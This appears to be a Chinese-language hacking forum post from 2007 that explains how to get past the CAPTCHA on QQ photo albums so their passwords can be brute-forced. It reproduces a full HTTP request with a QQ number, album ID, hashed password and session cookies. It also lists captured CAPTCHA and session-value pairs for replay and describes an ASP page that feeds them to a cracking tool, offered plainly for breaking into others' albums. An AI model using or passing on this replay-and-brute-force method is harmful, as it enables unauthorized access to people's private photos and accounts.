|
只是提供一种思路现在相册加了验证码所以以前我写的qq相册密码破解工具已经没用了今天我想到这个方法就是绕过验证码进行破解的
看演示
GET /cgi-bin/common/cgi_view_album?uin=215927967&refer=qzone&albumid=118370506&password=8277e0910d750195b448797616e091ad&verifycode=6em3 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://photo.qq.com/proxy.html
If-Modified-Since: 0
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; windows NT 5.1; SV1; .net CLR 2.0.50727)
Host: photo.qq.com
Connection: Keep-Alive
Cookie: pvid=52343013; flv=9.0; uin_cookie=104705883; euin_cookie=AQAYPyD/qOQasqBS3xpgl2mx65lA5T0103B3GAAAAAGLrApKgStQ07DCCN40kdjHcKYiGw==; zzpanelkey=; zzpaneluin=; qqmusic_fromtag=6; beVip=0; jump=4; verifysession=09d70072c0b67e96b4e0619ac5fd13cc3e47c2079ee633fa135432b4849e6000
这个是向服务器提交的数据
215927967这个是qq号码
118370506这个是相册ID值
在相册也可看到的
8277e0910d750195b448797616e091ad
这个是MD5加密的密码
verifycode=6em3
这个就是验证码了
看服务器给我们的验证码返回了什么值
verifysession=09d70072c0b67e96b4e0619ac5fd13cc3e47c2079ee633fa135432b4849e6000
研究不出是什么方式加密的
肯定也用了MD5吧
我用的是另一种方式
我记录下几组验证玛和值就不可以进行破解了吗
用工具向服务器提交我们自定义的数据和Cookie的值当然是验证码的值了
hsmr 值:fadce5ed661a163353a675077362dca2860767ed9af299b83ad80a628523b04b
ung5 值:a68cb3278e5a239ddcbf7bcfbd52b51e62308a01310960e01be3f5307281132c
9upg cc1105f8b1741c696fbf2df5b73b024561b5aa1b03da4264409a2924075b6b9e
yfhx d3a35df6f3d612d27130d90d2d098597403e0fe7a16b8a6195c6c901e472696f
yrkv 9b570ef0e772743724bd853fde8e56226af5f9456dad48a75f7d03f5a29fb6dc
可以了
我用asp写了个随机返回验证码和值的网页
然后用工具获取这些值再向腾讯的服务器提交我们自定义好的数据
我把上面收集好的验证码和值添加到数据库里了
然后用网页进行随机输出
看我写的工具
代码就不做详细的解释了
呵呵
看返回了什么
HTTP/1.1 200 OK
Date: Mon, 05 Nov 2007 07:49:19 GMT
Server: Apache
Cache-Control: max-age=0
Expires: Mon, 05 Nov 2007 07:49:19 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/xml
28
<?xml version="1.0" encoding="gb2312"?>
9
<return>
11
<value>0</value>
48
<msg><![CDATA[您所要查看的相册需要给出正确的密码才能访问!(805)]]></msg>
a
</return>
成功破解了
只要我们收集的验证码够多就可以进行暴力破解了 |
|